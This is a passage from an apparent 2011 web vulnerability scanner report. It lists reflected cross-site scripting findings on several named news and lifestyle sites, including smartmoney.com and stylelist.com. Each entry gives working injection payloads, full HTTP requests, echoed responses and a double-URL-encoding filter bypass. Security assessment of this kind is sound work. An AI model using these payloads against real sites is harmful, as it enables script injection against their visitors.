The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1147"><a>606c3770cc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/gardeningf1147"><a>606c3770cc8/ HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og=" ...[SNIP]... <link rel="canonical" href="http://www.shelterpop.com/category/gardeningf1147"><a>606c3770cc8/" /> ...[SNIP]...
1.632. http://www.shelterpop.com/category/gardening/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shelterpop.com
Path:
/category/gardening/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef409"><script>alert(1)</script>d58cbccc64c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/gardening/?ef409"><script>alert(1)</script>d58cbccc64c=1 HTTP/1.1 Host: www.shelterpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og=" ...[SNIP]... <link rel="canonical" href="http://www.shelterpop.com/category/gardening/?ef409"><script>alert(1)</script>d58cbccc64c=1" /> ...[SNIP]...
1.633. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slashfood.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56532"><script>alert(1)</script>375a63e9c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?56532"><script>alert(1)</script>375a63e9c9a=1 HTTP/1.1 Host: www.slashfood.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa2c4'-alert(1)-'46ed6e85f39 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfsaa2c4'-alert(1)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into an HTML comment. The payload 8f0a4%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec36879017da was submitted in the REST URL parameter 3. This input was echoed as 8f0a4--><script>alert(1)</script>c36879017da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-12968382610788f0a4%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec36879017da/ HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 19:53:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: NEWSMIUSER=DD5921E0%2D9E15%2D2350%2D10E6DA3D1269129C;domain=.smartmoney.com;expires=Tue, 29-Jan-2041 19:53:00 GMT;path=/ Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:00 GMT;path=/ Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:00 GMT;path=/ Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/ Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:03:05 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <!-- *Content Not Found*: are-hedgefund-etfs-worth-owning-12968382610788f0a4--><script>alert(1)</script>c36879017da --> ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe363"%3balert(1)//995ff310c7 was submitted in the cid parameter. This input was echoed as fe363";alert(1)//995ff310c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?cid=sm_dailyfinanceRSSfe363"%3balert(1)//995ff310c7 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb1e'-alert(1)-'e0cb2e7abcc was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?cid=sm_dailyfinanceRSSccb1e'-alert(1)-'e0cb2e7abcc HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99e5e"><img%20src%3da%20onerror%3dalert(1)>ecbe8eb5e2a was submitted in the cid parameter. This input was echoed as 99e5e"><img src=a onerror=alert(1)>ecbe8eb5e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?cid=sm_dailyfinanceRSS99e5e"><img%20src%3da%20onerror%3dalert(1)>ecbe8eb5e2a HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.639. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18785'-alert(1)-'36d3424e573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?18785'-alert(1)-'36d3424e573=1 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.640. http://www.smartmoney.com/investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a19d8"><a>7d19afe1560 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /investing/etfs/are-hedgefund-etfs-worth-owning-1296838261078/?a19d8"><a>7d19afe1560=1 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24155'-alert(1)-'1dc0411d84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks24155'-alert(1)-'1dc0411d84/should-investors-panic-over-egypt-1296838406557/ HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into an HTML comment. The payload aa756%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5039f8ae3bc was submitted in the REST URL parameter 3. This input was echoed as aa756--><script>alert(1)</script>5039f8ae3bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557aa756%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5039f8ae3bc/ HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 19:52:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: NEWSMIUSER=DD5772BC%2DE9AA%2D33D4%2D9FBC30FED0704BE0;domain=.smartmoney.com;expires=Tue, 29-Jan-2041 19:52:48 GMT;path=/ Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:52:48 GMT;path=/ Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:52:48 GMT;path=/ Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/ Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8d45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:03:05 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <!-- *Content Not Found*: should-investors-panic-over-egypt-1296838406557aa756--><script>alert(1)</script>5039f8ae3bc --> ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c7c7'-alert(1)-'d4a29c3988d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?cid=sm_dailyfinanceRSS1c7c7'-alert(1)-'d4a29c3988d HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfeaf"%3balert(1)//72d14877f5 was submitted in the cid parameter. This input was echoed as bfeaf";alert(1)//72d14877f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?cid=sm_dailyfinanceRSSbfeaf"%3balert(1)//72d14877f5 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb506"><img%20src%3da%20onerror%3dalert(1)>e21999d567b was submitted in the cid parameter. This input was echoed as cb506"><img src=a onerror=alert(1)>e21999d567b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?cid=sm_dailyfinanceRSScb506"><img%20src%3da%20onerror%3dalert(1)>e21999d567b HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.646. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49374"><a>f1236e573e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?49374"><a>f1236e573e3=1 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.647. http://www.smartmoney.com/investing/stocks/should-investors-panic-over-egypt-1296838406557/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb8a2'-alert(1)-'cdf627df069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /investing/stocks/should-investors-panic-over-egypt-1296838406557/?eb8a2'-alert(1)-'cdf627df069=1 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c8ea'-alert(1)-'a950531d8fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel6c8ea'-alert(1)-'a950531d8fc/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSS HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into an HTML comment. The payload cd100%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5254c019448 was submitted in the REST URL parameter 3. This input was echoed as cd100--><script>alert(1)</script>5254c019448 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520cd100%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5254c019448/?cid=sm_dailyfinanceRSS HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 19:53:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: NEWSMIUSER=DD59CB52%2DB026%2D0B3A%2D1713F70CEE191701;domain=.smartmoney.com;expires=Tue, 29-Jan-2041 19:53:04 GMT;path=/ Set-Cookie: ADCID=sm%5FdailyfinanceRSS;domain=.smartmoney.com;path=/ Set-Cookie: ADCID=sm%5FdailyfinanceRSS;domain=.smartmoney.com;path=/ Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:04 GMT;path=/ Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Sat, 06-Feb-2010 19:53:04 GMT;path=/ Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/ Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:03:09 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <!-- *Content Not Found*: skiing-with-olympic-stars-1296852410520cd100--><script>alert(1)</script>5254c019448 --> ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 381f1'-alert(1)-'a9f664bc8ae was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSS381f1'-alert(1)-'a9f664bc8ae HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9d62"%3balert(1)//b6f52c654db was submitted in the cid parameter. This input was echoed as c9d62";alert(1)//b6f52c654db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSSc9d62"%3balert(1)//b6f52c654db HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28d7"><img%20src%3da%20onerror%3dalert(1)>28dafd426a4 was submitted in the cid parameter. This input was echoed as d28d7"><img src=a onerror=alert(1)>28dafd426a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?cid=sm_dailyfinanceRSSd28d7"><img%20src%3da%20onerror%3dalert(1)>28dafd426a4 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.653. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4993c"><a>2ab8a0cc3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?4993c"><a>2ab8a0cc3f5=1 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.654. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8731f'-alert(1)-'e07193d9da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?8731f'-alert(1)-'e07193d9da=1 HTTP/1.1 Host: www.smartmoney.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb577"><a%20b%3dc>a29311a92da was submitted in the REST URL parameter 3. This input was echoed as fb577"><a b=c>a29311a92da in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/01fb577"><a%20b%3dc>a29311a92da/super-bowl-halftime-show/ HTTP/1.1 Host: www.spinner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.spinner.com/2011/02/01fb577"><a b=c>a29311a92da/super-bowl-halftime-show/" /> ...[SNIP]...
1.656. http://www.stylelist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891b1"><script>alert(1)</script>95f0c15586f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?891b1"><script>alert(1)</script>95f0c15586f=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/?891b1"><script>alert(1)</script>95f0c15586f=1" /> ...[SNIP]...
1.657. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.stylelist.com
Path:
/fashion-week
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41a92<a>49e23684579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fashion-week?41a92<a>49e23684579=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <span style="display:none;" id="category-name">fashion-week?41a92<a>49e23684579=1</span> ...[SNIP]...
1.658. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/fashion-week
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7207"-alert(1)-"dfc5f4a7abb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fashion-week?b7207"-alert(1)-"dfc5f4a7abb=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... e + " | Main Page";}
s_265.channel="us.style"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,stylelist.com"; s_265.prop12="http://www.stylelist.com/fashion-week?b7207"-alert(1)-"dfc5f4a7abb=1"; s_265.mmxgo=true; /* if ($bloggerslug!="") { s_265.mmxtitle="Posts at StyleList"; }*/ s_265.t(); } var s_account = "aolstylist,aolsvc"; (function(){ var d = ...[SNIP]...
1.659. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/fashion-week
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e84"><script>alert(1)</script>e086ddef527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fashion-week?47e84"><script>alert(1)</script>e086ddef527=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/fashion-week?47e84"><script>alert(1)</script>e086ddef527=1" /> ...[SNIP]...
1.660. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/hair/
Issue detail
